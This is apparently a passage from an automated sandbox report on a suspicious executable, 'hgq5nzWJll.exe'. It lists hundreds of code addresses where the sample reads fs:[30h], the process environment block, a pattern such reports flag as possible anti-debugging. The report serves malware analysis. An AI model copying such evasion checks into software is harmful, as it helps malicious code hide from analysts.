                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880535 mov eax, dword ptr fs:[00000030h]3_2_01880535
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878550 mov eax, dword ptr fs:[00000030h]3_2_01878550
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878550 mov eax, dword ptr fs:[00000030h]3_2_01878550
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A656A mov eax, dword ptr fs:[00000030h]3_2_018A656A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A656A mov eax, dword ptr fs:[00000030h]3_2_018A656A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A656A mov eax, dword ptr fs:[00000030h]3_2_018A656A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192A49A mov eax, dword ptr fs:[00000030h]3_2_0192A49A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018764AB mov eax, dword ptr fs:[00000030h]3_2_018764AB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A44B0 mov ecx, dword ptr fs:[00000030h]3_2_018A44B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FA4B0 mov eax, dword ptr fs:[00000030h]3_2_018FA4B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018704E5 mov ecx, dword ptr fs:[00000030h]3_2_018704E5
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A8402 mov eax, dword ptr fs:[00000030h]3_2_018A8402
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A8402 mov eax, dword ptr fs:[00000030h]3_2_018A8402
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A8402 mov eax, dword ptr fs:[00000030h]3_2_018A8402
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186C427 mov eax, dword ptr fs:[00000030h]3_2_0186C427
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186E420 mov eax, dword ptr fs:[00000030h]3_2_0186E420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186E420 mov eax, dword ptr fs:[00000030h]3_2_0186E420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186E420 mov eax, dword ptr fs:[00000030h]3_2_0186E420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F6420 mov eax, dword ptr fs:[00000030h]3_2_018F6420
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA430 mov eax, dword ptr fs:[00000030h]3_2_018AA430
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192A456 mov eax, dword ptr fs:[00000030h]3_2_0192A456
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AE443 mov eax, dword ptr fs:[00000030h]3_2_018AE443
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189245A mov eax, dword ptr fs:[00000030h]3_2_0189245A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186645D mov eax, dword ptr fs:[00000030h]3_2_0186645D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FC460 mov ecx, dword ptr fs:[00000030h]3_2_018FC460
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189A470 mov eax, dword ptr fs:[00000030h]3_2_0189A470
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189A470 mov eax, dword ptr fs:[00000030h]3_2_0189A470
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189A470 mov eax, dword ptr fs:[00000030h]3_2_0189A470
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191678E mov eax, dword ptr fs:[00000030h]3_2_0191678E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018707AF mov eax, dword ptr fs:[00000030h]3_2_018707AF
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019247A0 mov eax, dword ptr fs:[00000030h]3_2_019247A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187C7C0 mov eax, dword ptr fs:[00000030h]3_2_0187C7C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F07C3 mov eax, dword ptr fs:[00000030h]3_2_018F07C3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018927ED mov eax, dword ptr fs:[00000030h]3_2_018927ED
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018927ED mov eax, dword ptr fs:[00000030h]3_2_018927ED
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018927ED mov eax, dword ptr fs:[00000030h]3_2_018927ED
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FE7E1 mov eax, dword ptr fs:[00000030h]3_2_018FE7E1
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018747FB mov eax, dword ptr fs:[00000030h]3_2_018747FB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018747FB mov eax, dword ptr fs:[00000030h]3_2_018747FB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC700 mov eax, dword ptr fs:[00000030h]3_2_018AC700
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870710 mov eax, dword ptr fs:[00000030h]3_2_01870710
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A0710 mov eax, dword ptr fs:[00000030h]3_2_018A0710
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC720 mov eax, dword ptr fs:[00000030h]3_2_018AC720
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC720 mov eax, dword ptr fs:[00000030h]3_2_018AC720
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A273C mov eax, dword ptr fs:[00000030h]3_2_018A273C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A273C mov ecx, dword ptr fs:[00000030h]3_2_018A273C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A273C mov eax, dword ptr fs:[00000030h]3_2_018A273C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EC730 mov eax, dword ptr fs:[00000030h]3_2_018EC730
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A674D mov esi, dword ptr fs:[00000030h]3_2_018A674D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A674D mov eax, dword ptr fs:[00000030h]3_2_018A674D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A674D mov eax, dword ptr fs:[00000030h]3_2_018A674D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FE75D mov eax, dword ptr fs:[00000030h]3_2_018FE75D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870750 mov eax, dword ptr fs:[00000030h]3_2_01870750
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F4755 mov eax, dword ptr fs:[00000030h]3_2_018F4755
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2750 mov eax, dword ptr fs:[00000030h]3_2_018B2750
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2750 mov eax, dword ptr fs:[00000030h]3_2_018B2750
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878770 mov eax, dword ptr fs:[00000030h]3_2_01878770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880770 mov eax, dword ptr fs:[00000030h]3_2_01880770
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01874690 mov eax, dword ptr fs:[00000030h]3_2_01874690
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01874690 mov eax, dword ptr fs:[00000030h]3_2_01874690
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC6A6 mov eax, dword ptr fs:[00000030h]3_2_018AC6A6
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A66B0 mov eax, dword ptr fs:[00000030h]3_2_018A66B0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA6C7 mov ebx, dword ptr fs:[00000030h]3_2_018AA6C7
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA6C7 mov eax, dword ptr fs:[00000030h]3_2_018AA6C7
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE6F2 mov eax, dword ptr fs:[00000030h]3_2_018EE6F2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE6F2 mov eax, dword ptr fs:[00000030h]3_2_018EE6F2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE6F2 mov eax, dword ptr fs:[00000030h]3_2_018EE6F2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE6F2 mov eax, dword ptr fs:[00000030h]3_2_018EE6F2
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F06F1 mov eax, dword ptr fs:[00000030h]3_2_018F06F1
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F06F1 mov eax, dword ptr fs:[00000030h]3_2_018F06F1
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE609 mov eax, dword ptr fs:[00000030h]3_2_018EE609
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B2619 mov eax, dword ptr fs:[00000030h]3_2_018B2619
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A6620 mov eax, dword ptr fs:[00000030h]3_2_018A6620
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A8620 mov eax, dword ptr fs:[00000030h]3_2_018A8620
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187262C mov eax, dword ptr fs:[00000030h]3_2_0187262C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188E627 mov eax, dword ptr fs:[00000030h]3_2_0188E627
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0188C640 mov eax, dword ptr fs:[00000030h]3_2_0188C640
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA660 mov eax, dword ptr fs:[00000030h]3_2_018AA660
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA660 mov eax, dword ptr fs:[00000030h]3_2_018AA660
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193866E mov eax, dword ptr fs:[00000030h]3_2_0193866E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193866E mov eax, dword ptr fs:[00000030h]3_2_0193866E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A2674 mov eax, dword ptr fs:[00000030h]3_2_018A2674
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018829A0 mov eax, dword ptr fs:[00000030h]3_2_018829A0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018709AD mov eax, dword ptr fs:[00000030h]3_2_018709AD
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018709AD mov eax, dword ptr fs:[00000030h]3_2_018709AD
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F89B3 mov esi, dword ptr fs:[00000030h]3_2_018F89B3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F89B3 mov eax, dword ptr fs:[00000030h]3_2_018F89B3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F89B3 mov eax, dword ptr fs:[00000030h]3_2_018F89B3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193A9D3 mov eax, dword ptr fs:[00000030h]3_2_0193A9D3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019069C0 mov eax, dword ptr fs:[00000030h]3_2_019069C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0187A9D0 mov eax, dword ptr fs:[00000030h]3_2_0187A9D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A49D0 mov eax, dword ptr fs:[00000030h]3_2_018A49D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FE9E0 mov eax, dword ptr fs:[00000030h]3_2_018FE9E0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A29F9 mov eax, dword ptr fs:[00000030h]3_2_018A29F9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A29F9 mov eax, dword ptr fs:[00000030h]3_2_018A29F9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE908 mov eax, dword ptr fs:[00000030h]3_2_018EE908
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE908 mov eax, dword ptr fs:[00000030h]3_2_018EE908
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FC912 mov eax, dword ptr fs:[00000030h]3_2_018FC912
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01868918 mov eax, dword ptr fs:[00000030h]3_2_01868918
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01868918 mov eax, dword ptr fs:[00000030h]3_2_01868918
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F892A mov eax, dword ptr fs:[00000030h]3_2_018F892A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0190892B mov eax, dword ptr fs:[00000030h]3_2_0190892B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F0946 mov eax, dword ptr fs:[00000030h]3_2_018F0946
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01944940 mov eax, dword ptr fs:[00000030h]3_2_01944940
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B096E mov eax, dword ptr fs:[00000030h]3_2_018B096E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B096E mov edx, dword ptr fs:[00000030h]3_2_018B096E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B096E mov eax, dword ptr fs:[00000030h]3_2_018B096E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01914978 mov eax, dword ptr fs:[00000030h]3_2_01914978
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01914978 mov eax, dword ptr fs:[00000030h]3_2_01914978
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01896962 mov eax, dword ptr fs:[00000030h]3_2_01896962
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01896962 mov eax, dword ptr fs:[00000030h]3_2_01896962
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01896962 mov eax, dword ptr fs:[00000030h]3_2_01896962
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FC97C mov eax, dword ptr fs:[00000030h]3_2_018FC97C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870887 mov eax, dword ptr fs:[00000030h]3_2_01870887
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FC89D mov eax, dword ptr fs:[00000030h]3_2_018FC89D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189E8C0 mov eax, dword ptr fs:[00000030h]3_2_0189E8C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019408C0 mov eax, dword ptr fs:[00000030h]3_2_019408C0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC8F9 mov eax, dword ptr fs:[00000030h]3_2_018AC8F9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AC8F9 mov eax, dword ptr fs:[00000030h]3_2_018AC8F9
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0193A8E4 mov eax, dword ptr fs:[00000030h]3_2_0193A8E4
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FC810 mov eax, dword ptr fs:[00000030h]3_2_018FC810
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191483A mov eax, dword ptr fs:[00000030h]3_2_0191483A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191483A mov eax, dword ptr fs:[00000030h]3_2_0191483A
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018AA830 mov eax, dword ptr fs:[00000030h]3_2_018AA830
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov eax, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov eax, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov eax, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov ecx, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov eax, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01892835 mov eax, dword ptr fs:[00000030h]3_2_01892835
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01882840 mov ecx, dword ptr fs:[00000030h]3_2_01882840
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01874859 mov eax, dword ptr fs:[00000030h]3_2_01874859
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01874859 mov eax, dword ptr fs:[00000030h]3_2_01874859
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A0854 mov eax, dword ptr fs:[00000030h]3_2_018A0854
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01906870 mov eax, dword ptr fs:[00000030h]3_2_01906870
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01906870 mov eax, dword ptr fs:[00000030h]3_2_01906870
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FE872 mov eax, dword ptr fs:[00000030h]3_2_018FE872
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FE872 mov eax, dword ptr fs:[00000030h]3_2_018FE872
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01924BB0 mov eax, dword ptr fs:[00000030h]3_2_01924BB0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01924BB0 mov eax, dword ptr fs:[00000030h]3_2_01924BB0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880BBE mov eax, dword ptr fs:[00000030h]3_2_01880BBE
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01880BBE mov eax, dword ptr fs:[00000030h]3_2_01880BBE
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191EBD0 mov eax, dword ptr fs:[00000030h]3_2_0191EBD0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01890BCB mov eax, dword ptr fs:[00000030h]3_2_01890BCB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01890BCB mov eax, dword ptr fs:[00000030h]3_2_01890BCB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01890BCB mov eax, dword ptr fs:[00000030h]3_2_01890BCB
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870BCD mov eax, dword ptr fs:[00000030h]3_2_01870BCD
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870BCD mov eax, dword ptr fs:[00000030h]3_2_01870BCD
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01870BCD mov eax, dword ptr fs:[00000030h]3_2_01870BCD
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189EBFC mov eax, dword ptr fs:[00000030h]3_2_0189EBFC
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878BF0 mov eax, dword ptr fs:[00000030h]3_2_01878BF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878BF0 mov eax, dword ptr fs:[00000030h]3_2_01878BF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01878BF0 mov eax, dword ptr fs:[00000030h]3_2_01878BF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018FCBF0 mov eax, dword ptr fs:[00000030h]3_2_018FCBF0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EEB1D mov eax, dword ptr fs:[00000030h]3_2_018EEB1D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01944B00 mov eax, dword ptr fs:[00000030h]3_2_01944B00
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189EB20 mov eax, dword ptr fs:[00000030h]3_2_0189EB20
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0189EB20 mov eax, dword ptr fs:[00000030h]3_2_0189EB20
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01938B28 mov eax, dword ptr fs:[00000030h]3_2_01938B28
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01938B28 mov eax, dword ptr fs:[00000030h]3_2_01938B28
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191EB50 mov eax, dword ptr fs:[00000030h]3_2_0191EB50
